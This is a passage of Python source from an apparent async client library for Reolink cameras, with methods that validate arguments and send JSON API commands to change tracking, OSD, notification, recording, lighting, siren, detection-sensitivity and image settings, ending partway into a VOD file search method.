self._auto_track_settings:\n return False\n\n if \"bSmartTrack\" in self._auto_track_settings[channel]:\n return self._auto_track_settings[channel][\"bSmartTrack\"] == 1\n\n return self._auto_track_settings[channel][\"aiTrack\"] == 1\n\n def auto_track_disappear_time(self, channel: int) -> int:\n if channel not in self._auto_track_settings:\n return -1\n\n return self._auto_track_settings[channel].get(\"aiDisappearBackTime\", -1)\n\n def auto_track_stop_time(self, channel: int) -> int:\n if channel not in self._auto_track_settings:\n return -1\n\n return self._auto_track_settings[channel].get(\"aiStopBackTime\", -1)\n\n def auto_track_method(self, channel: int) -> Optional[int]:\n if channel not in self._auto_track_settings:\n return None\n\n return self._auto_track_settings[channel].get(\"aiTrack\")\n\n async def set_auto_tracking(\n self, channel: int, enable: bool | None = None, disappear_time: int | None = None, stop_time: int | None = None, method: int | str | None = None\n ) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_auto_tracking: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"auto_track\"):\n raise NotSupportedError(f\"set_auto_tracking: Auto tracking on camera {self.camera_name(channel)} is not available\")\n\n params = {\"channel\": channel}\n if enable is not None:\n if \"bSmartTrack\" in self._auto_track_settings[channel]:\n params[\"bSmartTrack\"] = 1 if enable else 0\n else:\n params[\"aiTrack\"] = 1 if enable else 0\n if disappear_time is not None:\n params[\"aiDisappearBackTime\"] = disappear_time\n if stop_time is not None:\n params[\"aiStopBackTime\"] = stop_time\n if method is not None:\n if isinstance(method, str):\n method_int = TrackMethodEnum[method].value\n else:\n method_int = method\n params[\"aiTrack\"] = method_int\n method_list = [val.value for val in TrackMethodEnum]\n if method_int not in method_list:\n raise InvalidParameterError(f\"set_auto_tracking: method {method_int} not in {method_list}\")\n\n body = [{\"cmd\": \"SetAiCfg\", \"action\": 0, \"param\": params}]\n await self.send_setting(body)\n\n def auto_track_limit_left(self, channel: int) -> int:\n \"\"\"-1 = limit not set\"\"\"\n if channel not in self._auto_track_limits:\n return -1\n\n return self._auto_track_limits[channel][\"PtzTraceSection\"][\"LimitLeft\"]\n\n def auto_track_limit_right(self, channel: int) -> int:\n \"\"\"-1 = limit not set\"\"\"\n if channel not in self._auto_track_limits:\n return -1\n\n return self._auto_track_limits[channel][\"PtzTraceSection\"][\"LimitRight\"]\n\n async def set_auto_track_limit(self, channel: int, left: int | None = None, right: int | None = None) -> None:\n \"\"\"-1 = disable limit\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_auto_track_limit: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"auto_track_limit\"):\n raise NotSupportedError(f\"set_auto_track_limit: Auto track limits on camera {self.camera_name(channel)} is not available\")\n if left is None and right is None:\n raise InvalidParameterError(\"set_auto_track_limit: either left or right limit needs to be specified\")\n if left is not None and (left < -1 or left > 2700):\n raise InvalidParameterError(f\"set_auto_track_limit: left limit {left} not in range -1...2700\")\n if right is not None and (right < -1 or right > 2700):\n raise InvalidParameterError(f\"set_auto_track_limit: right limit {right} not in range -1...2700\")\n\n params = {\"channel\": channel}\n if left is not None:\n params[\"LimitLeft\"] = left\n if right is not None:\n params[\"LimitRight\"] = right\n\n body = [{\"cmd\": \"SetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": params}}]\n await self.send_setting(body)\n\n def validate_osd_pos(self, pos) -> bool:\n \"\"\"Helper function for validating an OSD position\n Returns True, if a valid position is specified\"\"\"\n return pos in [\n \"Upper Left\",\n \"Upper Right\",\n \"Top Center\",\n \"Bottom Center\",\n \"Lower Left\",\n \"Lower Right\",\n ]\n\n async def set_osd(self, channel: int, namePos=None, datePos=None, enableWaterMark=None) -> None:\n \"\"\"Set OSD parameters.\n Parameters:\n namePos (string) specifies the position of the camera name - \"Off\" disables this OSD\n datePos (string) specifies the position of the date - \"Off\" disables this OSD\n enableWaterMark (boolean) enables/disables the Logo (WaterMark) if supported\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_osd: no camera connected to channel '{channel}'\")\n\n await self.get_state(\"GetOsd\")\n\n if channel not in self._osd_settings or not self._osd_settings[channel]:\n raise NotSupportedError(f\"set_osd: OSD on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetOsd\", \"action\": 0, \"param\": self._osd_settings[channel]}]\n\n if namePos is not None:\n if namePos == \"Off\":\n body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"enable\"] = 0\n else:\n if not self.validate_osd_pos(namePos):\n raise InvalidParameterError(f\"set_osd: Invalid name OSD position specified '{namePos}'\")\n body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"enable\"] = 1\n body[0][\"param\"][\"Osd\"][\"osdChannel\"][\"pos\"] = namePos\n\n if datePos is not None:\n if datePos == \"Off\":\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"enable\"] = 0\n else:\n if not self.validate_osd_pos(datePos):\n raise InvalidParameterError(f\"set_osd: Invalid date OSD position specified '{datePos}'\")\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"enable\"] = 1\n body[0][\"param\"][\"Osd\"][\"osdTime\"][\"pos\"] = datePos\n\n if enableWaterMark is not None:\n if \"watermark\" in body[0][\"param\"][\"Osd\"]:\n if enableWaterMark:\n body[0][\"param\"][\"Osd\"][\"watermark\"] = 1\n else:\n body[0][\"param\"][\"Osd\"][\"watermark\"] = 0\n else:\n _LOGGER.debug(\n 'Ignoring \"enable watermark\" request. Not supported by camera %s.',\n self.camera_name(channel),\n )\n\n await self.send_setting(body)\n\n async def set_push(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the Push-notifications parameter.\"\"\"\n if not self.supported(channel, \"push\"):\n raise NotSupportedError(f\"set_push: push-notifications on camera {self.camera_name(channel)} are not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetPush\") >= 1:\n body = [{\"cmd\": \"SetPushV20\", \"action\": 0, \"param\": {\"Push\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"push\"):\n body = [{\"cmd\": \"SetPush\", \"action\": 0, \"param\": {\"Push\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_push: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetPush\") >= 1:\n body = [{\"cmd\": \"SetPushV20\", \"action\": 0, \"param\": {\"Push\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetPush\", \"action\": 0, \"param\": {\"Push\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_ftp(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the FTP-notifications parameter.\"\"\"\n if not self.supported(channel, \"ftp\"):\n raise NotSupportedError(f\"set_ftp: FTP on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetFtp\") >= 1:\n body = [{\"cmd\": \"SetFtpV20\", \"action\": 0, \"param\": {\"Ftp\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"ftp\"):\n body = [{\"cmd\": \"SetFtp\", \"action\": 0, \"param\": {\"Ftp\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ftp: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetFtp\") >= 1:\n body = [{\"cmd\": \"SetFtpV20\", \"action\": 0, \"param\": {\"Ftp\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetFtp\", \"action\": 0, \"param\": {\"Ftp\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_email(self, channel: int | None, enable: bool) -> None:\n if not self.supported(channel, \"email\"):\n raise NotSupportedError(f\"set_email: Email on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetEmail\") >= 1:\n body = [{\"cmd\": \"SetEmailV20\", \"action\": 0, \"param\": {\"Email\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"email\"):\n body = [{\"cmd\": \"SetEmail\", \"action\": 0, \"param\": {\"Email\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_email: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetEmail\") >= 1:\n body = [{\"cmd\": \"SetEmailV20\", \"action\": 0, \"param\": {\"Email\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetEmail\", \"action\": 0, \"param\": {\"Email\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_recording(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the recording parameter.\"\"\"\n if not self.supported(channel, \"recording\"):\n raise NotSupportedError(f\"set_recording: recording on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n if self.api_version(\"GetRec\") >= 1:\n body = [{\"cmd\": \"SetRecV20\", \"action\": 0, \"param\": {\"Rec\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n for ch in self._channels:\n if self.supported(ch, \"recording\"):\n body = [{\"cmd\": \"SetRec\", \"action\": 0, \"param\": {\"Rec\": {\"schedule\": {\"enable\": on_off, \"channel\": ch}}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_recording: no camera connected to channel '{channel}'\")\n\n if self.api_version(\"GetRec\") >= 1:\n body = [{\"cmd\": \"SetRecV20\", \"action\": 0, \"param\": {\"Rec\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [{\"cmd\": \"SetRec\", \"action\": 0, \"param\": {\"Rec\": {\"schedule\": {\"enable\": on_off, \"channel\": channel}}}}]\n\n await self.send_setting(body)\n\n async def set_buzzer(self, channel: int | None, enable: bool) -> None:\n \"\"\"Set the NVR buzzer parameter.\"\"\"\n if not self.supported(channel, \"buzzer\"):\n raise NotSupportedError(f\"set_buzzer: NVR buzzer on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json\n on_off = 1 if enable else 0\n if channel is None:\n body = [{\"cmd\": \"SetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"Buzzer\": {\"enable\": on_off}}}]\n await self.send_setting(body)\n return\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_recording: no camera connected to channel '{channel}'\")\n\n body = [{\"cmd\": \"SetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"Buzzer\": {\"scheduleEnable\": on_off, \"schedule\": {\"channel\": channel}}}}]\n await self.send_setting(body)\n\n async def set_audio(self, channel: int, enable: bool) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_audio: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetEnc\")\n if channel not in self._enc_settings:\n raise NotSupportedError(f\"set_audio: Audio on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetEnc\", \"action\": 0, \"param\": self._enc_settings[channel]}]\n body[0][\"param\"][\"Enc\"][\"audio\"] = 1 if enable else 0\n\n await self.send_setting(body)\n\n async def set_ir_lights(self, channel: int, enable: bool) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ir_lights: no camera connected to channel '{channel}'\")\n if channel not in self._ir_settings:\n raise NotSupportedError(f\"set_ir_lights: IR light on camera {self.camera_name(channel)} is not available\")\n\n state = \"Auto\" if enable else \"Off\"\n body: typings.reolink_json = [\n {\n \"cmd\": \"SetIrLights\",\n \"action\": 0,\n \"param\": {\"IrLights\": {\"channel\": channel, \"state\": state}},\n }\n ]\n\n await self.send_setting(body)\n\n async def set_status_led(self, channel: int, state: bool | str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_status_led: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"status_led\"):\n raise NotSupportedError(f\"set_status_led: Status led on camera {self.camera_name(channel)} is not available\")\n\n if isinstance(state, bool):\n value = \"On\" if state else \"Off\"\n else:\n value = state\n\n val_list = [val.value for val in StatusLedEnum]\n if value not in val_list:\n raise InvalidParameterError(f\"set_status_led: value {value} not in {val_list}\")\n\n if self.is_doorbell(channel):\n param = {\"channel\": channel, \"eDoorbellLightState\": value}\n else:\n param = {\"channel\": channel, \"state\": value}\n\n body: typings.reolink_json = [{\"cmd\": \"SetPowerLed\", \"action\": 0, \"param\": {\"PowerLed\": param}}]\n await self.send_setting(body)\n\n async def set_whiteled(self, channel: int, state: bool | None = None, brightness: int | None = None, mode: int | str | None = None) -> None:\n \"\"\"\n Set the WhiteLed parameter.\n with Reolink Duo GetWhiteLed returns an error state\n SetWhiteLed appears to require 4 parameters\n state - two values 0/1 possibly OFF/ON\n channel - appears to default to 0\n mode - three values I think\n 0 Night Mode Off\n 1 Night Mode On , AUTO on\n 3 Night Mode On, Set Time On\n brightness - brigtness level range 0 to 100\n\n TO BE CONFIRMED\n There may be an extra set of parameters with Duo - dont know with others\n LightingSchedule : { EndHour , EndMin, StartHour,StartMin }\n \"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_whiteled: no camera connected to channel '{channel}'\")\n if channel not in self._whiteled_settings or not self._whiteled_settings[channel]:\n raise NotSupportedError(f\"set_whiteled: White Led on camera {self.camera_name(channel)} is not available\")\n\n settings = {\"channel\": channel}\n if state is not None:\n settings[\"state\"] = 1 if state else 0\n if brightness is not None:\n settings[\"bright\"] = brightness\n if brightness < 0 or brightness > 100:\n raise InvalidParameterError(f\"set_whiteled: brightness {brightness} not in range 0..100\")\n if mode is not None:\n if isinstance(mode, str):\n mode_int = SpotlightModeEnum[mode].value\n else:\n mode_int = mode\n settings[\"mode\"] = mode_int\n mode_list = [mode.value for mode in SpotlightModeEnum]\n if mode_int not in mode_list:\n raise InvalidParameterError(f\"set_whiteled: mode {mode_int} not in {mode_list}\")\n\n body = [\n {\n \"cmd\": \"SetWhiteLed\",\n \"param\": {\"WhiteLed\": settings},\n }\n ]\n\n await self.send_setting(body, wait_before_get=3)\n\n async def set_spotlight_lighting_schedule(self, channel: int, endhour=6, endmin=0, starthour=18, startmin=0) -> None:\n \"\"\"Stub to handle setting the time period where spotlight (WhiteLed) will be on when NightMode set and AUTO is off.\n Time in 24-hours format\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_spotlight_lighting_schedule: no camera connected to channel '{channel}'\")\n if channel not in self._whiteled_settings or not self._whiteled_settings[channel]:\n raise NotSupportedError(f\"set_spotlight_lighting_schedule: White Led on camera {self.camera_name(channel)} is not available\")\n\n if (\n endhour < 0\n or endhour > 23\n or endmin < 0\n or endmin > 59\n or starthour < 0\n or starthour > 23\n or startmin < 0\n or startmin > 59\n or (endhour == starthour and endmin < startmin)\n or (not (endhour < 12 and starthour > 16) and (endhour < starthour))\n ):\n raise InvalidParameterError(\n f\"set_spotlight_lighting_schedule: Parameter error on camera {self.camera_name(channel)} start time: {starthour}:{startmin}, end time: {endhour}:{endmin}\"\n )\n\n body = [\n {\n \"cmd\": \"SetWhiteLed\",\n \"param\": {\n \"WhiteLed\": {\n \"LightingSchedule\": {\n \"EndHour\": endhour,\n \"EndMin\": endmin,\n \"StartHour\": starthour,\n \"StartMin\": startmin,\n },\n \"channel\": channel,\n \"mode\": 3,\n }\n },\n }\n ]\n\n await self.send_setting(body)\n\n async def set_spotlight(self, channel: int, enable: bool) -> None:\n \"\"\"Simply calls set_whiteled with brightness 100, mode 3 after setting lightning schedule to on all the time 0000 to 2359.\"\"\"\n if enable:\n await self.set_spotlight_lighting_schedule(channel, 23, 59, 0, 0)\n await self.set_whiteled(channel, enable, 100, 3)\n return\n\n await self.set_spotlight_lighting_schedule(channel, 0, 0, 0, 0)\n await self.set_whiteled(channel, enable, 100, 1)\n\n async def set_volume(self, channel: int, volume: int | None = None, doorbell_button_sound: bool | None = None) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_volume: no camera connected to channel '{channel}'\")\n if volume is not None:\n if not self.supported(channel, \"volume\"):\n raise NotSupportedError(f\"set_volume: Volume control on camera {self.camera_name(channel)} is not available\")\n if not isinstance(volume, int):\n raise InvalidParameterError(f\"set_volume: volume {volume} not integer\")\n if volume < 0 or volume > 100:\n raise InvalidParameterError(f\"set_volume: volume {volume} not in range 0...100\")\n if doorbell_button_sound is not None:\n if not self.supported(channel, \"doorbell_button_sound\"):\n raise NotSupportedError(f\"set_volume: Doorbell button sound control on camera {self.camera_name(channel)} is not available\")\n if not isinstance(doorbell_button_sound, bool):\n raise InvalidParameterError(f\"set_volume: doorbell_button_sound {doorbell_button_sound} not boolean\")\n\n params = {\"channel\": channel}\n if volume is not None:\n params[\"volume\"] = volume\n if doorbell_button_sound is not None:\n params[\"visitorLoudspeaker\"] = 1 if doorbell_button_sound else 0\n\n body = [{\"cmd\": \"SetAudioCfg\", \"action\": 0, \"param\": {\"AudioCfg\": params}}]\n await self.send_setting(body)\n\n async def set_quick_reply(self, channel: int, enable: bool | None = None, file_id: int | None = None, time: int | None = None) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_quick_reply: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"quick_reply\"):\n raise NotSupportedError(f\"set_quick_reply: Quick reply on camera {self.camera_name(channel)} is not available\")\n if file_id is not None and not isinstance(file_id, int):\n raise InvalidParameterError(f\"set_quick_reply: file_id {file_id} not integer\")\n if file_id is not None and file_id not in self.quick_reply_dict(channel):\n raise InvalidParameterError(f\"set_quick_reply: file_id {file_id} not in {list(self.quick_reply_dict(channel))}\")\n if time is not None and not isinstance(time, int):\n raise InvalidParameterError(f\"set_quick_reply: time {time} not integer\")\n if time is not None and time < 0:\n raise InvalidParameterError(f\"set_quick_reply: time {time} can not be < 0\")\n\n params: dict[str, Any] = {\"channel\": channel}\n if enable is not None:\n if enable:\n params[\"enable\"] = 1\n current_file_id = self.quick_reply_file(channel)\n if current_file_id == -1:\n current_file_id = list(self.quick_reply_dict(channel))[1]\n params[\"fileId\"] = current_file_id\n else:\n params[\"enable\"] = 0\n if file_id is not None:\n if file_id >= 0:\n params[\"enable\"] = 1\n params[\"fileId\"] = file_id\n else:\n params[\"enable\"] = 0\n if time is not None:\n params[\"timeout\"] = time\n\n body = [{\"cmd\": \"SetAutoReply\", \"action\": 0, \"param\": {\"AutoReply\": params}}]\n await self.send_setting(body)\n\n async def set_audio_alarm(self, channel: int, enable: bool) -> None:\n # fairly basic only either turns it off or on\n # called in its simple form by set_siren\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_audio_alarm: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"siren\"):\n raise NotSupportedError(f\"set_audio_alarm: AudioAlarm on camera {self.camera_name(channel)} is not available\")\n\n if self.api_version(\"GetAudioAlarm\") >= 1:\n body = [{\"cmd\": \"SetAudioAlarmV20\", \"param\": {\"Audio\": {\"enable\": 1 if enable else 0, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [\n {\n \"cmd\": \"SetAudioAlarm\",\n \"param\": {\n \"Audio\": {\n \"schedule\": {\n \"enable\": 1 if enable else 0,\n \"channel\": channel,\n }\n }\n },\n }\n ]\n\n await self.send_setting(body)\n\n async def set_siren(self, channel: int, enable: bool = True, duration: int | None = 2) -> None:\n # Uses API AudioAlarmPlay with manual switch\n # uncertain if there may be a glitch - dont know if there is API I have yet to find\n # which sets AudioLevel\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_siren: no camera connected to channel '{channel}'\")\n if duration is not None and not isinstance(duration, int):\n raise InvalidParameterError(f\"set_siren: duration '{duration}' is not integer\")\n if not self.supported(channel, \"siren_play\"):\n raise NotSupportedError(f\"set_siren: AudioAlarmPlay on camera {self.camera_name(channel)} is not available\")\n\n if enable:\n if duration is not None:\n params = {\n \"alarm_mode\": \"times\",\n \"times\": duration,\n \"channel\": channel,\n }\n else:\n params = {\n \"alarm_mode\": \"manul\",\n \"manual_switch\": 1,\n \"channel\": channel,\n }\n else:\n params = {\n \"alarm_mode\": \"manul\",\n \"manual_switch\": 0,\n \"channel\": channel,\n }\n\n body = [\n {\n \"cmd\": \"AudioAlarmPlay\",\n \"action\": 0,\n \"param\": params,\n }\n ]\n\n await self.send_setting(body)\n\n async def set_daynight(self, channel: int, value: str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_daynight: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetIsp\")\n if channel not in self._isp_settings or not self._isp_settings[channel]:\n raise NotSupportedError(f\"set_daynight: ISP on camera {self.camera_name(channel)} is not available\")\n\n val_list = [val.value for val in DayNightEnum]\n if value not in val_list:\n raise InvalidParameterError(f\"set_daynight: value {value} not in {val_list}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetIsp\", \"action\": 0, \"param\": self._isp_settings[channel]}]\n body[0][\"param\"][\"Isp\"][\"dayNight\"] = value\n\n await self.send_setting(body)\n\n async def set_backlight(self, channel: int, value: str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_backlight: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetIsp\")\n if channel not in self._isp_settings or not self._isp_settings[channel]:\n raise NotSupportedError(f\"set_backlight: ISP on camera {self.camera_name(channel)} is not available\")\n\n if value not in [\"BackLightControl\", \"DynamicRangeControl\", \"Off\"]:\n raise InvalidParameterError(f\"set_backlight: value {value} not in ['BackLightControl', 'DynamicRangeControl', 'Off']\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetIsp\", \"action\": 0, \"param\": self._isp_settings[channel]}]\n body[0][\"param\"][\"Isp\"][\"backLight\"] = value\n\n await self.send_setting(body)\n\n async def set_motion_detection(self, channel: int, enable: bool) -> None:\n \"\"\"Set the motion detection parameter.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_motion_detection: no camera connected to channel '{channel}'\")\n if channel not in self._md_alarm_settings:\n raise NotSupportedError(f\"set_motion_detection: alarm on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAlarm\", \"action\": 0, \"param\": self._md_alarm_settings[channel]}]\n body[0][\"param\"][\"Alarm\"][\"enable\"] = 1 if enable else 0\n\n await self.send_setting(body)\n\n async def set_md_sensitivity(self, channel: int, value: int) -> None:\n \"\"\"Set motion detection sensitivity.\n Here the camera web and windows application show a completely different value than set.\n So the calculation <51 - value> makes the \"real\" value.\n \"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_md_sensitivity: no camera connected to channel '{channel}'\")\n if channel not in self._md_alarm_settings:\n raise NotSupportedError(f\"set_md_sensitivity: md sensitivity on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_md_sensitivity: sensitivity '{value}' is not integer\")\n if value < 1 or value > 50:\n raise InvalidParameterError(f\"set_md_sensitivity: sensitivity {value} not in range 1...50\")\n\n body: typings.reolink_json\n if self.api_version(\"GetMdAlarm\") >= 1:\n body = [{\"cmd\": \"SetMdAlarm\", \"action\": 0, \"param\": {\"MdAlarm\": {\"channel\": channel, \"useNewSens\": 1, \"newSens\": {\"sensDef\": int(51 - value)}}}}]\n else:\n body = [\n {\n \"cmd\": \"SetAlarm\",\n \"action\": 0,\n \"param\": {\n \"Alarm\": {\n \"channel\": channel,\n \"type\": \"md\",\n \"sens\": self._md_alarm_settings[channel][\"Alarm\"][\"sens\"],\n }\n },\n }\n ]\n for setting in body[0][\"param\"][\"Alarm\"][\"sens\"]:\n setting[\"sensitivity\"] = int(51 - value)\n\n await self.send_setting(body)\n\n async def set_ai_sensitivity(self, channel: int, value: int, ai_type: str) -> None:\n \"\"\"Set AI detection sensitivity.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ai_sensitivity: no camera connected to channel '{channel}'\")\n if channel not in self._ai_alarm_settings:\n raise NotSupportedError(f\"set_ai_sensitivity: ai sensitivity on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_ai_sensitivity: sensitivity '{value}' is not integer\")\n if value < 0 or value > 100:\n raise InvalidParameterError(f\"set_ai_sensitivity: sensitivity {value} not in range 0...100\")\n if ai_type not in self.ai_supported_types(channel):\n raise InvalidParameterError(f\"set_ai_sensitivity: ai type '{ai_type}' not supported for channel {channel}, suppored types are {self.ai_supported_types(channel)}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAiAlarm\", \"action\": 0, \"param\": {\"AiAlarm\": {\"channel\": channel, \"ai_type\": ai_type, \"sensitivity\": value}}}]\n await self.send_setting(body)\n\n async def set_ai_delay(self, channel: int, value: int, ai_type: str) -> None:\n \"\"\"Set AI detection delay time in seconds.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ai_delay: no camera connected to channel '{channel}'\")\n if channel not in self._ai_alarm_settings:\n raise NotSupportedError(f\"set_ai_delay: ai delay on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_ai_delay: delay '{value}' is not integer\")\n if value < 0 or value > 8:\n raise InvalidParameterError(f\"set_ai_delay: delay {value} not in range 0...8\")\n if ai_type not in self.ai_supported_types(channel):\n raise InvalidParameterError(f\"set_ai_delay: ai type '{ai_type}' not supported for channel {channel}, suppored types are {self.ai_supported_types(channel)}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAiAlarm\", \"action\": 0, \"param\": {\"AiAlarm\": {\"channel\": channel, \"ai_type\": ai_type, \"stay_time\": value}}}]\n await self.send_setting(body)\n\n async def set_image(\n self, channel: int, bright: int | None = None, contrast: int | None = None, saturation: int | None = None, hue: int | None = None, sharpen: int | None = None\n ) -> None:\n \"\"\"Set image adjustments.\"\"\"\n _image = {\"Image\": {\"channel\": channel}}\n\n if bright is not None:\n if not self.supported(channel, \"isp_bright\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(bright, int):\n raise InvalidParameterError(f\"set_image: bright '{bright}' is not integer\")\n if bright < 0 or bright > 255:\n raise InvalidParameterError(f\"set_image: bright {bright} not in range 0...255\")\n _image[\"Image\"][\"bright\"] = bright\n\n if contrast is not None:\n if not self.supported(channel, \"isp_contrast\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(contrast, int):\n raise InvalidParameterError(f\"set_image: contrast '{contrast}' is not integer\")\n if contrast < 0 or contrast > 255:\n raise InvalidParameterError(f\"set_image: contrast {contrast} not in range 0...255\")\n _image[\"Image\"][\"contrast\"] = contrast\n\n if saturation is not None:\n if not self.supported(channel, \"isp_satruation\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(saturation, int):\n raise InvalidParameterError(f\"set_image: saturation '{saturation}' is not integer\")\n if saturation < 0 or saturation > 255:\n raise InvalidParameterError(f\"set_image: saturation {saturation} not in range 0...255\")\n _image[\"Image\"][\"saturation\"] = saturation\n\n if hue is not None:\n if not self.supported(channel, \"isp_hue\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(hue, int):\n raise InvalidParameterError(f\"set_image: hue '{hue}' is not integer\")\n if hue < 0 or hue > 255:\n raise InvalidParameterError(f\"set_image: hue {hue} not in range 0...255\")\n _image[\"Image\"][\"hue\"] = hue\n\n if sharpen is not None:\n if not self.supported(channel, \"isp_sharpen\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(sharpen, int):\n raise InvalidParameterError(f\"set_image: sharpen '{sharpen}' is not integer\")\n if sharpen < 0 or sharpen > 255:\n raise InvalidParameterError(f\"set_image: sharpen {sharpen} not in range 0...255\")\n _image[\"Image\"][\"sharpen\"] = sharpen\n\n body: typings.reolink_json = [{\"cmd\": \"SetImage\", \"param\": _image}]\n await self.send_setting(body)\n\n async def request_vod_files(\n self,\n channel: int,\n start: datetime,\n end: datetime,\n status_only: bool = False,\n stream: Optional[str] = None,\n ) -> tuple[list[typings.VOD_search_status], list[typings.VOD_file]]:\n \"\"\"Send search VOD-files command.\"\"\"\n if channel not in self._stream_channels:\n raise InvalidParameterError(f\"Request VOD files: no camera connected to channel '{channel}'\")\n\n if stream is None:\n stream = self._stream\n\n body = [\n {\n \"cmd\": \"Search\",\n \"action\": 0,\n \"param\": {\n \"Search\": {\n \"channel\": channel,\n \"onlyStatus\": 1 if status_only else 0,\n \"streamType\": stream,\n \"StartTime\": datetime_to_reolink_time(start),\n \"EndTime\": datetime_to_reolink_time(end),\n }\n },\n }\n ]\n\n try:\n json_data = await self.send(body, {\"cmd\": \"Search\"}, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Request VOD files error: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Request VOD files error: {str(err)}\") from err\n\n if json_data[0].get(\"code\", -1) != 0:\n raise ApiError(f\"Host: {self._host}:{self._port}: Request VOD files: API returned error code {json_data[0].get('code', -1)}, response: {json_data}\")\n\n search_result = json_data[0].get(\"value\", {}).get(\"SearchResult\", {})\n if \"Status\" not in search_result:\n raise 